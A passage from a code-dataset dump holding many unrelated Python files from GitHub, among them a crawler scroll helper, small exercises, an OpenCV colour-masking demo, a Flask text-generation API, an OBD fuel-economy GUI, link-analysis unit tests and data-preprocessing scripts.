scroll_bottom(self, selectorParent=None, selectorDom=None, limit_page=0):\n try:\n if selectorParent is None or selectorDom is None:\n return False\n\n is_success = True\n limit = 1\n\n # Get scroll height\n last_height = self.driver.execute_script(\"return \"+selectorDom+\".scrollHeight\")\n\n while True:\n try:\n if limit_page > 0:\n if limit > limit_page:\n break\n\n # Scroll down to bottom\n self.driver.execute_script(selectorParent+\".scrollTo(0, \"+selectorDom+\".scrollHeight);\")\n\n # Wait to load page\n sleep(1)\n\n # Calculate new scroll height and compare with last scroll height\n new_height = self.driver.execute_script(\"return \"+selectorDom+\".scrollHeight\")\n limit = limit + 1\n if limit % 10 == 0:\n log.logger.info('scroll bottom %d steps.' % (limit))\n if new_height == last_height:\n break\n last_height = new_height\n except Exception as e:\n is_success = False\n log.logger.error(e, exc_info=True)\n break\n\n return is_success\n\n # log.logger.info('last_height: %d' % (last_height))\n except Exception as e:\n log.logger.error(e, exc_info=True)\n return False\n\nif __name__ == \"__main__\":\n cgv = Instagram()\n cgv.utf_8_reload()\n cgv.start()\n","repo_name":"ko9ma7/crawler-1","sub_path":"instagram.py","file_name":"instagram.py","file_ext":"py","file_size_in_byte":29791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13209109091","text":"#Start\nprint (\"Amount Due: 50\")\ncoin = int(input (\"Insert Coin: \"))\n\ncost = 50 - coin\n\nwhile cost > 0:\n if coin == 25 or coin == 10 or coin == 5:\n print (\"Amount Due: \", cost)\n coin = input (\"Insert Coin: \")\n coin = int(coin)\n cost = cost - coin\n else:\n print (\"Amount Due: 50\")\n coin = input (\"Insert Coin: \")\n coin = int(coin)\n\nif cost==0:\n print (\"Change owed: 0\")\nelse:\n cost = (-1)*cost\n print(\"Change owed:\", cost)","repo_name":"joel-quek/Harvard-CS50P","sub_path":"Week 2 - Loops/coke/coke.py","file_name":"coke.py","file_ext":"py","file_size_in_byte":484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26167048908","text":"import re\nf=lambda s:''.join(map(g,re.split(r'([.?!])',s)))\ndef g(s):\n s=s.lower();r=''\n while s:\n c,*s=s;C=c.upper()\n if C= 0 and metal < 0.2:\n metal_lo = 0\n metal_hi = 0.2\n elif metal >= 0.2 and metal <= 0.5:\n metal_lo = 0.2\n metal_hi = 0.5\n\n if temp%250 != 0 and temp != 50000:\n temp_lo = math.floor(4 / 1000 * temp) / 4 * 1000\n temp_hi = math.ceil(4 / 1000 * temp) / 4 * 1000\n elif temp%250 == 0 and temp != 50000:\n temp_lo = temp\n temp_hi = temp+250\n elif temp == 50000:\n temp_lo = 47500\n 
temp_hi = 50000\n\n if interp == \" Linear \":\n interp_par = \"linear\"\n elif interp == \"Nearest neighbour\":\n interp_par = \"nearest\"\n\n return grav_lo,grav_hi,temp_lo,temp_hi,metal_lo,metal_hi,interp_par\n\n","repo_name":"cam92473/model_flux","sub_path":"calculations/vertices.py","file_name":"vertices.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44038983888","text":"# Read a line of input and parse into a list of strings\nstringList = input().split(' ')\nanagrams = dict()\n\n\ndef sort_string(word):\n letters_of_the_word = []\n final_string = ''\n for letter in word:\n letters_of_the_word.append(letter)\n letters_of_the_word.sort()\n for sorted_letter in letters_of_the_word:\n final_string += str(sorted_letter)\n return final_string\n\n\nfor element in stringList:\n anagrams[sort_string(str(element))] = []\nfor element in stringList:\n if sort_string(str(element)) in anagrams.keys():\n anagrams[sort_string(str(element))].append(element)\n\n\nkeys = list(anagrams.keys())\nkeys.sort()\nfor key in keys:\n print(key + ': ' + str(anagrams[key]))","repo_name":"danisaurio/C950-Complementary-excercises","sub_path":"Write code that incorporates the use of dictionaries/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4361871252","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nimport gc\nfrom tqdm import tqdm\nimport time\nfrom contextlib import contextmanager\n\n\n@contextmanager\ndef timer(name):\n t0 = time.time()\n yield\n print(f'[{name}] done in {time.time() - t0:.0f} s')\n\ndef preprocess(data: pd.DataFrame):\n \"\"\" Preprocess the data\n \"\"\"\n\n def fill_outliers(col: pd.Series):\n \"\"\" Remove outliers of each col\n \"\"\"\n mean = col.mean()\n std = col.std()\n upper = mean + 3 * std\n lower = mean - 3 * std\n col[col > upper] = np.floor(upper)\n col[col < lower] = np.floor(lower)\n return col.values\n\n # Handle discrete values & fill NaNs (with the column mean)\n columns = data.columns\n for col_name in tqdm(columns):\n data[col_name] = data[col_name].fillna(data[col_name].mean())\n # Standardization\n return data\n\nwith timer(\"split train and test dataset!!!\"):\n # Read the train and test sets\n X_train = pd.read_csv('./dataset/atec_anti_fraud_train.csv', encoding='utf-8',\n low_memory=False, parse_dates=['date'],index_col='id')\n X_test = pd.read_csv('./dataset/atec_anti_fraud_test_b.csv', encoding='utf-8',\n low_memory=False, parse_dates=['date'],index_col='id')\n col_train_num, col_test_num = X_train.columns, X_test.columns\n X_train, X_test = X_train[col_train_num], X_test[col_test_num]\n X_train_label,X_train_date=X_train.pop('label'),X_train.pop('date')\n X_test_date=X_test.pop('date')\n print(X_train.shape, X_test.shape)\n print(\"Start filter features!!!\")\n # Keep features whose missing rate is below the threshold (currently 1.0, i.e. drop all-null columns)\n col_train, col_test = [], []\n for item in X_train.columns:\n tmp = np.sum(X_train[item].isnull()) / len(X_train)\n if tmp < 1:\n col_train.append(item)\n for item in X_test.columns:\n tmp = np.sum(X_test[item].isnull()) / len(X_test)\n if tmp <1:\n col_test.append(item)\n # Keep the intersection of train and test features\n col = [item for item in col_train if item in col_test]\n print('len(col):', len(col))\n X_train, X_test = X_train[col], X_test[col]\n X_train, X_test = preprocess(X_train), preprocess(X_test)\n
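 # NOTE (added): preprocess() already returns a pandas DataFrame, so the\n # pd.DataFrame(...) wrap on the next line is a defensive no-op kept from the original.\n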
 X_train, X_test = pd.DataFrame(X_train),pd.DataFrame(X_test)\n \n X_train=pd.concat([X_train_label,X_train_date,X_train],axis=1)\n X_test=pd.concat([X_test_date,X_test],axis=1)\n\n X_train_col,X_test_col=col.copy(),col.copy() \n X_train_col.insert(0,'label')\n X_train_col.insert(1,'date')\n X_test_col.insert(0,'date')\n\n print(X_train.shape, X_test.shape)\n print(\"Start writing\")\n X_train.to_csv(\"./dataset/x_train.csv\", encoding='utf-8',header=X_train_col)\n X_test.to_csv(\"./dataset/x_test_b.csv\", encoding='utf-8',header=X_test_col)\n del X_train,X_test\n gc.collect()\n\n","repo_name":"haitwang-cloud/atec_anti_fraud","sub_path":"dataFilter.py","file_name":"dataFilter.py","file_ext":"py","file_size_in_byte":2941,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"72956585449","text":"import pygame\n\nfrom pygsear import Game, Drawable, Path\n\n\nclass Wing(Drawable.RotatedImage):\n def __init__(self):\n Drawable.RotatedImage.__init__(self, filename='arrow/right.png', steps=36)\n p = Path.RandomAccelerationPathBounded(minSpeed=2)\n self.set_path(p)\n self.center()\n\n self.stretch(dx=50, keepAspectRatio=0)\n\n def move(self):\n self.set_rotation(self.path.get_direction())\n Drawable.RotatedImage.move(self)\n\n\nclass AGame(Game.Game):\n def initialize(self):\n self.makeWings()\n\n def makeWings(self):\n for thing in range(5):\n i = Wing()\n self.sprites.add(i)\n\n\ng = AGame()\ng.mainloop()\n\n","repo_name":"davesteele/pygsear-debian","sub_path":"examples/wings.py","file_name":"wings.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69973416807","text":"# Parse a novel's content page\nimport requests\nimport bs4\n\n\ndef get_content(title, content_url):\n r = requests.get(content_url)\n bs = bs4.BeautifulSoup(r.text, 'html.parser')\n content = bs.select('.content')\n if len(content) > 0:\n list_p = content[0].find_all('p')\n for i in list_p:\n save_content(title, i.string)\n\n\ndef save_content(title, content):\n file = open(title, 'a+')\n file.write(content)\n file.close()\n","repo_name":"yzwgithub/TeachPython","sub_path":"height_class(18-22)/class_22/class_22_07.py","file_name":"class_22_07.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"28511577692","text":"print(__doc__)\r\n#Authors : Zouhir Amrani && Youssef Snoussi\r\n#Contact : youssef.snoussi199@hotmail.com\r\n\r\n\r\n\r\nimport cv2\r\nimport numpy as np\r\nimport time\r\n\r\n\r\ndef CAP(file):\r\n\t\r\n\t# Create a VideoCapture object\r\n\tcap = cv2.VideoCapture(file)\r\n\r\n\t# Give the camera some time to set itself up\r\n\ttime.sleep(3)\r\n\tcount = 0\r\n\t#background=0\r\n\r\n\t# Capture and store the static background frame\r\n\tfor i in range(60):\r\n\t\tret,background = cap.read()\r\n\r\n\tbackground = np.flip(background,axis=1)\r\n\r\n
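\t# NOTE (added): \"invisibility cloak\" idea - pixels matching the target colour are\r\n\t# replaced by the pre-recorded static background, everything else keeps the live frame.\r\n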
\twhile(cap.isOpened()):\r\n\t\tret, img = cap.read()\r\n\t\tif not ret:\r\n\t\t\tbreak\r\n\t\tcount+=1\r\n\t\tprint(count)\r\n\t\timg = np.flip(img,axis=1)\r\n\t\r\n\t\t# Convert the colour space from BGR to HSV\r\n\t\thsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n\r\n\t\t# Generate a mask to detect the colour\r\n\t\tlower_color = np.array([34,12,61])\r\n\t\tupper_color = np.array([97,87,255])\r\n\t\tmask1 = cv2.inRange(hsv,lower_color,upper_color)\r\n\r\n\t\tlower_color = np.array([255,255,255])\r\n\t\tupper_color = np.array([255,255,255])\r\n\t\tmask2 = cv2.inRange(hsv,lower_color,upper_color)\r\n\r\n\t\tmask3 = mask1+mask2\r\n\r\n\t\t# Refine the mask matching the detected colour\r\n\t\t# (NOTE: the refined masks below are not used afterwards; res1/res2 still use mask3 and its inverse)\r\n\t\tmask1 = cv2.morphologyEx(mask3, cv2.MORPH_OPEN, np.ones((3,3),np.uint8),iterations=2)\r\n\t\tmask1 = cv2.dilate(mask3,np.ones((3,3),np.uint8),iterations = 1)\r\n\t\tmask2 = cv2.bitwise_not(mask3)\r\n\r\n\t\t# Generate the final result\r\n\t\tres1 = cv2.bitwise_and(background,background,mask=mask3)\r\n\t\tres2 = cv2.bitwise_and(img,img,mask=mask2)\r\n\t\tfinal_output = cv2.addWeighted(res1,1,res2,1,0)\r\n\t\t# Display the results\r\n\t\tcv2.imshow('backGround',background)\r\n\t\tcv2.imshow('Cape Magic !!!',final_output)\r\n\t\tcv2.imshow('original video',img)\r\n\t\t\r\n\r\n\t\tk = cv2.waitKey(1)\r\n\t\tif k == 27:\r\n\t\t\tbreak\r\n\tcap.release()\r\n\tcv2.destroyAllWindows()\r\n\r\n\r\n","repo_name":"youssef-sno/Color-based-object-tracking-with-python-and-opencv","sub_path":"cap.py","file_name":"cap.py","file_ext":"py","file_size_in_byte":1804,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30422704333","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport io\nimport json\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom flask_cors import CORS, cross_origin\nimport random\nimport numpy as np\nimport torch\nfrom flask import Flask, jsonify, request\n\nfrom textblob import TextBlob\ndef correct_word(word):\n if word==\"\\n\":\n return \"\\n\"\n elif word==\"mot\":\n return \"not\"\n elif word==\"mo\":\n return \"no\"\n elif word ==\"j\":\n return \"i\"\n else:\n return str(TextBlob(word).correct())\n\n# Class Definition\n\nclass Anastasia(nn.Module):\n\n def __init__(self, input_size, vocab_size):\n super(Anastasia, self).__init__()\n self.lstm = nn.LSTM(input_size, 256, batch_first=True)\n self.lstm2 = nn.LSTM(256, 512, batch_first=True)\n self.linear1 = nn.Linear(256, 512)\n self.dropout1 = nn.Dropout(0.4)\n self.linear2 = nn.Linear(512, 1024)\n self.linear3 = nn.Linear(1024, 1024)\n self.dropout2 = nn.Dropout(0.75)\n self.out = nn.Linear(1024, vocab_size)\n\n def forward(self, input):\n (output, _) = self.lstm(input)\n output = torch.tanh(output)\n output = self.linear1(output)\n output = F.leaky_relu(output)\n output = self.dropout1(output)\n output = self.linear2(output)\n output = F.relu(output)\n output = self.linear3(output)\n output = torch.tanh(output)\n output = self.dropout2(output)\n output = self.out(output)\n output = torch.reshape(output, (input.shape[0], vocab_len))\n return output\n\n\nchar_to_int = {\n '\\n': 0,\n ' ': 1,\n '!': 2,\n \"'\": 3,\n '(': 4,\n ')': 5,\n ',': 6,\n '-': 7,\n '.': 8,\n ':': 9,\n ';': 10,\n '?': 11,\n 'a': 12,\n 'b': 13,\n 'c': 14,\n 'd': 15,\n 'e': 16,\n 'f': 17,\n 'g': 18,\n 'h': 19,\n 'i': 20,\n 'j': 21,\n 'k': 22,\n 'l': 23,\n 'm': 24,\n 'n': 25,\n 'o': 26,\n 'p': 27,\n 'q': 28,\n 'r': 29,\n 's': 30,\n 't': 31,\n 'u': 32,\n 'v': 33,\n 'w': 34,\n 'x': 35,\n 'y': 36,\n 'z': 37,\n }\nint_to_char = {\n 0: '\\n',\n 1: ' ',\n 2: '!',\n 3: \"'\",\n 4: '(',\n 5: ')',\n 6: ',',\n 7: '-',\n 8: '.',\n 9: ':',\n 10: ';',\n 11: '?',\n 12: 'a',\n 13: 'b',\n 14: 'c',\n 15: 'd',\n 16: 'e',\n 17: 'f',\n 18: 'g',\n 19: 'h',\n 20: 'i',\n 21: 'j',\n 22: 'k',\n 23: 'l',\n 24: 'm',\n 25: 'n',\n 26: 'o',\n 27: 'p',\n 28: 'q',\n 29: 'r',\n 30: 's',\n 31: 't',\n 32: 'u',\n 33: 'v',\n 34: 'w',\n 35: 'x',\n 36: 'y',\n 37: 'z',\n }\n\n\n# Predict Function 
Definition\n\ndef predict_input(\n model,\n vocab_len,\n newcount=14,\n value='',\n ):\n val = value[:50]\n pattern = [char_to_int[i] for i in val]\n n_val = char_to_int['\\n']\n word_out = ''\n count_nl = pattern.count(n_val)\n i = 0\n while count_nl != newcount:\n x = np.reshape(pattern[-50:], (1, 1, 50))\n x = x / float(vocab_len)\n x = torch.tensor(x)\n prediction = F.softmax(model(x))\n index = torch.argmax(prediction).item()\n prediction = np.reshape(prediction.detach().numpy(), vocab_len)\n if int_to_char[index] == '\\n' and char_to_int['\\n'] \\\n in pattern[-40:]:\n while int_to_char[index] == '\\n':\n index = np.random.choice(vocab_len, 1, p=prediction)[0]\n if (pattern[-1] == char_to_int[' '] or pattern[-1]\n == char_to_int['\\n'] or pattern[-1] == char_to_int['t']) \\\n and random.random() < 0.25 or int_to_char[index] == '-':\n index = np.random.choice(vocab_len, 1, p=prediction)[0]\n while int_to_char[index] == '\\n' or int_to_char[index] \\\n == ' ' or int_to_char[index] == '-':\n index = np.random.choice(vocab_len, 1, p=prediction)[0]\n result = int_to_char[index]\n if result == ' ' and char_to_int['\\n'] \\\n not in pattern[-40:len(pattern)]:\n result = '\\n'\n index = char_to_int['\\n']\n if result == '\\n':\n count_nl += 1\n seq_in = [int_to_char[value] for value in pattern]\n pattern.append(index)\n word_out += result\n word_out = word_out.replace('\\n', ' \\n ')\n wordslist = word_out.split()\n if len(wordslist) > 2:\n if wordslist[-1] == wordslist[-2] or len(wordslist[-1]) > 9:\n lastword = wordslist.pop(-1)\n word_out = word_out[:-len(lastword)]\n pattern = pattern[:-len(lastword)].copy()\n i -= len(lastword)\n i += 1\n out = [int_to_char[i].replace('\\n', ' \\n ') for i in pattern]\n out = ''.join(out)\n out = [correct_word(i) for i in out.split(' ')]\n out = ' '.join(out).replace('\\n ', '\\n')\n return out\n\n\napp = Flask(__name__)\ncors = CORS(app)\nfilepath_load = 'ana_weight.pth'\nseq_length = 50\nvocab_len = len(char_to_int.keys())\nmodel = Anastasia(seq_length, vocab_len).double()\nmodel.load_state_dict(torch.load(filepath_load))\n\n\n@app.route('/predict', methods=['POST'])\n@cross_origin()\ndef predict():\n if request.method == 'POST':\n content = request.get_json()\n app.logger.info(content)\n inp = str(content.get('sonnet')).lower()\n linecount = int(content.get('numLines'))\n output = predict_input(model, vocab_len, linecount, inp)\n return jsonify({'output': output})\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"Aakash-Ez/Anastasia-Poem-RNN","sub_path":"Anastasia-Flask-API/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19391606135","text":"from typing import List\nfrom pytest import approx\n\n\ndef drawdown(values: List[float]) -> float:\n \"\"\" Calculates the maximum drawdown of a series of values\"\"\"\n max_dd = 0\n for i, v in enumerate(values):\n peak = max(values[:i+1])\n dd = v/peak - 1\n if dd <= max_dd:\n max_dd = dd\n\n return max_dd\n\n\ndef test_drawdown():\n values = [100, 105, 110, 115, 110, 105, 110, 120, 140, 135]\n dd = drawdown(values)\n assert dd == approx(105/115 - 1)\n\n\nif __name__ == '__main__':\n test_drawdown()","repo_name":"kristjorge/shinywaffle","sub_path":"shinywaffle/common/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"40356290497","text":"import keras\nfrom nltk import word_tokenize\nimport numpy as np\nimport pickle\nfrom keras.preprocessing.sequence import pad_sequences\n\ntokenizer = pickle.load(open('tokenizer.pickle','rb'))\nmaxlen = 50\n\ndef load_model():\n model = keras.models.load_model(\"emoji_model.h5\")\n pickle_in = open(\"word2index.pickle\",\"rb\")\n word2idx = pickle.load(pickle_in)\n return model , word2idx\n\ndef textpreprocessing(text,word2idx):\n text = word_tokenize(text.lower())\n test_sent = tokenizer.texts_to_sequences([text])\n test_sent = pad_sequences(test_sent, maxlen = maxlen)\n \n return test_sent\n\ndef predict_emoji(X , model):\n res = model.predict(X)\n res = np.argmax(res) \n return int(res)\n \ndef get_html_emoji(result):\n #return html code of emoji\n emoji2code = {\n 0 : \"😃\",\n 1 : \"😨\",\n 2 : \"😠\",\n 3 : \"😞\",\n 4 : \"🤢\",\n 5 : \"😬\",\n 6 : \"😣\"\n }\n\n return emoji2code[result] \n\ndef update_model(x , actual , model):\n new_test = np.vstack([x]*5)\n actual_output = np.zeros((1,7))\n actual_output[0,actual] = 1\n actual_output = np.vstack([actual_output]*5)\n model.compile(loss='categorical_crossentropy' , optimizer = 'adam' , metrics = ['acc'])\n model.fit(new_test , actual_output , epochs = 10 , batch_size = 32 , shuffle = True)\n model.save('emoji_model.h5')\n return model\n\ndef get_emoji_num(emoji):\n emoji2num = {\n \"happy\" : 0,\n \"fear\" : 1,\n \"anger\" : 2,\n \"sadness\" : 3,\n \"disgust\" : 4,\n \"shame\" : 5,\n \"guilt\" : 6\n }\n return emoji2num[emoji]","repo_name":"Shubby98/Emojify","sub_path":"text2emoji.py","file_name":"text2emoji.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27922507984","text":"\"\"\"Functions for unzipping zip archives.\"\"\"\n\nimport argparse\nimport zipfile\n\n\ndef unzip(filename):\n \"\"\"Generator that yields files in the given zip archive.\"\"\"\n with zipfile.ZipFile(filename, 'r') as archive:\n for zipinfo in archive.infolist():\n yield archive.open(zipinfo, 'r'), {\n 'name': zipinfo.filename,\n }\n\n\ndef main(filenames):\n for filename in filenames:\n for srcfile, metadata in unzip(filename):\n with open(metadata['name'], 'w') as f:\n f.write(srcfile.read())\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__)\n parser.add_argument('zip_files', nargs='+')\n\n args = parser.parse_args()\n main(args.zip_files)\n","repo_name":"GoogleCloudPlatform/community","sub_path":"archived/data-science-extraction/unzip.py","file_name":"unzip.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"en","doc_type":"code","stars":1892,"dataset":"github-code","pt":"53"} +{"seq_id":"12511349993","text":"import sys\nimport obd\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\n\nclass OBDGui(QWidget):\n def __init__(self, parent = None):\n super(OBDGui, self).__init__(parent)\n\n # Set window geometry\n self.title = 'OBD GUI'\n self.left = 10\n self.top = 10\n self.width = 450\n self.height = 200\n self.setWindowTitle(self.title)\n self.setGeometry(self.left, self.top, self.width, self.height)\n layout = QVBoxLayout()\n\n # MPG Slider\n self.s = QProgressBar()\n self.s.setRange(0,50)\n self.s.setValue(0)\n self.s.setTextVisible(False)\n self.s.setAlignment(Qt.AlignRight)\n layout.addWidget(self.s)\n\n # MPG Value Text\n self.l = QLabel(\"0.0 MPGs\")\n self.l.setFont(QFont('Fira Sans Semi-Light', 16))\n 
 # Update timer\n print(\"Connecting to OBD Receiver\")\n self.connection = obd.Async()\n print(\"Connection successful. Starting command watch loop...\")\n self.connection.watch(obd.commands.SPEED)\n self.connection.watch(obd.commands.RPM)\n self.connection.watch(obd.commands.INTAKE_PRESSURE)\n self.connection.watch(obd.commands.INTAKE_TEMP)\n self.connection.start()\n self.timer = QTimer()\n self.timer.timeout.connect(self.getmpg)\n self.timer.start(500)\n\n # Open the CSV Log File\n self.mf = open(\"mpg.csv\", \"w+\")\n self.mf.write(\"MPG,RPM,SPEED,IMAP,TMP,MAP\\n\")\n\n # Arrange all widgets\n self.setLayout(layout)\n\n\n def getmpg(self):\n SPEED = self.connection.query(obd.commands.SPEED).value.magnitude\n # MAF Calculation (speed-density method)\n RPM = self.connection.query(obd.commands.RPM).value.magnitude\n MAP = self.connection.query(obd.commands.INTAKE_PRESSURE).value.magnitude\n TMP = self.connection.query(obd.commands.INTAKE_TEMP).value.magnitude+273.15\n R = 8.314 # Specific gas constant (J/(mol*K))\n MM = 28.97 # Molecular mass of air (g/mol)\n DISP = 3.964 # Engine displacement in L\n VE = 0.75 # Volumetric efficiency, play around with this value\n IMAP = (RPM*MAP)/TMP # intake term: rev/min * kPa / K\n MAF = (IMAP/120)*VE*DISP*(MM/R) # mass air flow in g/s\n MPG = (710.7*SPEED)/(MAF*100) # SPEED in km/h; 710.7 folds in fuel density and unit conversions\n self.mf.write(\"{},{},{},{},{},{}\\n\".format(MPG,RPM,SPEED,IMAP,TMP,MAP))\n self.l.setText(str(MPG)+\" MPGs\")\ndef main():\n app = QApplication(sys.argv)\n ex = OBDGui()\n ex.show()\n sys.exit(app.exec_())\n \n\t\nif __name__ == '__main__':\n main()","repo_name":"Pixadus/PiDashboard","sub_path":".archive/mpg-gui-text.py","file_name":"mpg-gui-text.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3285293008","text":"import os\nimport shutil\nfrom uuid import uuid4\n\nimport flask\nimport selenium\nfrom selenium.common.exceptions import InvalidArgumentException\n\nfrom backend.endpoints.link import get_downloaded_filenames, get_iframe_urls, teardown_downloads, get_urls, get_metrics, setup, link\nimport backend\n\n\nclass TestLink:\n def test_teardown_downloads_directory_exists(self, mocker):\n temp_download_directory = mocker.MagicMock()\n mocker.patch('shutil.rmtree')\n mocker.patch('os.path.isdir', return_value=True)\n\n teardown_downloads(directory=temp_download_directory)\n\n shutil.rmtree.assert_called_once()\n\n def test_teardown_downloads_directory_does_not_exist(self, mocker):\n temp_download_directory = mocker.MagicMock()\n mocker.patch('backend.endpoints.link.logger.info')\n mocker.patch('shutil.rmtree')\n mocker.patch('os.path.isdir', return_value=False)\n\n teardown_downloads(directory=temp_download_directory)\n\n shutil.rmtree.assert_not_called()\n backend.endpoints.link.logger.info.assert_called_once()\n\n def test_get_downloaded_filenames_directory_exists(self, mocker):\n download_filenames = [\"one\", \"two\", \"three\"]\n temp_download_directory = mocker.MagicMock()\n mocker.patch('os.listdir', return_value=download_filenames)\n mocker.patch('os.path.isdir', return_value=True)\n \n result = get_downloaded_filenames(directory=temp_download_directory)\n \n assert result == download_filenames\n\n def test_get_downloaded_filenames_directory_does_not_exist(self, mocker):\n temp_download_directory = mocker.MagicMock()\n mocker.patch('backend.endpoints.link.logger.info')\n mocker.patch('os.listdir')\n mocker.patch('os.path.isdir', return_value=False)\n \n result = 
get_downloaded_filenames(directory=temp_download_directory)\n \n os.listdir.assert_not_called()\n backend.endpoints.link.logger.info.assert_called_once()\n assert result == []\n\n def test_get_iframe_urls(self, mocker):\n mock_iframe_url = \"mock_iframe_url\"\n mock_iframe = mocker.MagicMock()\n mock_iframe.get_property.return_value = mock_iframe_url\n iframe_urls = [mock_iframe]\n mock_driver = mocker.patch(\"selenium.webdriver.Chrome\")\n mock_driver.find_elements_by_tag_name.return_value = iframe_urls\n\n result = get_iframe_urls(driver=mock_driver)\n\n assert result == [mock_iframe_url]\n \n def test_get_urls(self, mocker):\n mock_url = \"mock_url\"\n mock_redirect_url = \"mock_redirect_url\"\n mock_current_url = \"mock_current_url\"\n mock_url_response = mocker.MagicMock()\n mock_url_response.url = mock_url\n mock_redirect_response = mocker.MagicMock()\n mock_redirect_response.url = mock_redirect_url\n mock_history = mocker.MagicMock()\n mock_history.history = [mock_url_response, mock_redirect_response]\n mocker.patch(\"requests.get\", return_value=mock_history)\n \n mock_driver = mocker.patch(\"selenium.webdriver.Chrome\")\n mock_driver.current_url = mock_current_url\n \n landing_result, redirect_result = get_urls(driver=mock_driver, url=mock_url)\n\n assert landing_result == [mock_current_url]\n assert redirect_result == [mock_url, mock_redirect_url, mock_current_url]\n\n def test_get_metrics(self, mocker):\n urls = ([\"url0\", \"url1\"], [\"url2\"])\n iframe_urls = [\"iframe_url0\", \"iframe_url1\"]\n download_filenames = [\"filename0\", \"filename1\"]\n mocker.patch(\"backend.endpoints.link.get_urls\", return_value=urls)\n mocker.patch(\"backend.endpoints.link.get_iframe_urls\", return_value=iframe_urls)\n mocker.patch(\"backend.endpoints.link.get_downloaded_filenames\", return_value=download_filenames)\n\n driver = mocker.MagicMock()\n url = mocker.MagicMock()\n temp_download_directory = mocker.MagicMock()\n landing_url, redirect_urls, iframe_urls, download_filenames = get_metrics(driver=driver, url=url, temp_download_directory=temp_download_directory)\n\n assert ((landing_url, redirect_urls), iframe_urls, download_filenames) == (urls, iframe_urls, download_filenames)\n\n def test_setup(self, mocker):\n mock_driver = mocker.MagicMock()\n mocker.patch(\"selenium.webdriver.ChromeOptions\")\n mocker.patch(\"os.mkdir\")\n mocker.patch(\"selenium.webdriver.Chrome\", return_value=mock_driver)\n\n with backend.app.app.app_context():\n driver, temp_download_directory = setup()\n\n assert driver == mock_driver\n assert isinstance(temp_download_directory, str)\n","repo_name":"alexd-conf/link_analysis","sub_path":"backend/tests/unit_tests/test_link_endpoint.py","file_name":"test_link_endpoint.py","file_ext":"py","file_size_in_byte":4692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4930841262","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Nov 17 20:45:37 2018\r\n\r\n@author: Gaurav Rai\r\n\"\"\"\r\n\r\n# Set working directory\r\n#path = input(\"Input file path directory: \")\r\nimport os\r\n#os.chdir(path)\r\nos.chdir('D:\\Analytics_Vidhya_Research\\AM_Expert_2018 Competition')\r\nos.getcwd()\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n#%matplotlib inline\r\nplt.style.use('bmh')\r\n\r\n# Reading complete dataset\r\ndataset = pd.read_csv('train.csv',sep = ',',low_memory=False)\r\n\r\n\r\n\r\n####################################################\r\n## Feature Engineering 
Step - From Historical Logs\r\n####################################################\r\n# Reading complete dataset\r\ndataset_feature = pd.read_csv('historical_user_logs.csv',sep = ',',low_memory=False)\r\ndataset_feature.dtypes\r\n\r\n# Feature Engineering Steps on historical data\r\n# Count each user's view/interest actions, grouped by user_id, product and action.\r\n# These added features will be merged with the provided train data set for analysis.\r\ndf_feat_grp = dataset_feature.groupby(['user_id','product','action'])['action'].agg('count') # (named aggregation, e.g. .agg(count_action='count'), would label the count column directly)\r\n\r\ndf_feat1 = pd.DataFrame({'cols':df_feat_grp.index, 'count_action':df_feat_grp.values})\r\n\r\ndf_feat1[['user_id','product','action']] = df_feat1['cols'].apply(pd.Series) \r\n\r\ndf_feat1.drop(['cols'], axis=1, inplace=True)\r\n\r\ndf_feat2 = df_feat1.groupby(['user_id','action'])['count_action'].agg('sum')\r\n\r\ndf_feat3 = pd.DataFrame({'cols':df_feat2.index, 'count_action':df_feat2.values})\r\n\r\ndf_feat3[['user_id','action']] = df_feat3['cols'].apply(pd.Series) \r\n\r\ndf_feat3.drop('cols', axis=1, inplace=True)\r\n\r\ndataset_full1 = pd.merge(dataset, df_feat3, how='left', left_on=['user_id'], right_on = ['user_id'])\r\n\r\n# Check the data types of the columns\r\ndata_dtypes = dataset_full1.dtypes\r\n\r\nfrom sklearn.model_selection import train_test_split\r\ndataset_train ,dataset_test = train_test_split(dataset_full1,test_size=0.2)\r\ndataset_train['source'] = 'Train'\r\ndataset_test['source'] = 'Test'\r\n\r\n\r\n# Combining the dataset again for further computations\r\ndataset_full = pd.concat([dataset_train,dataset_test], axis = 0)\r\n\r\n########################\r\n# Missing value imputation (NAs)\r\n########################\r\n\r\n# First check for 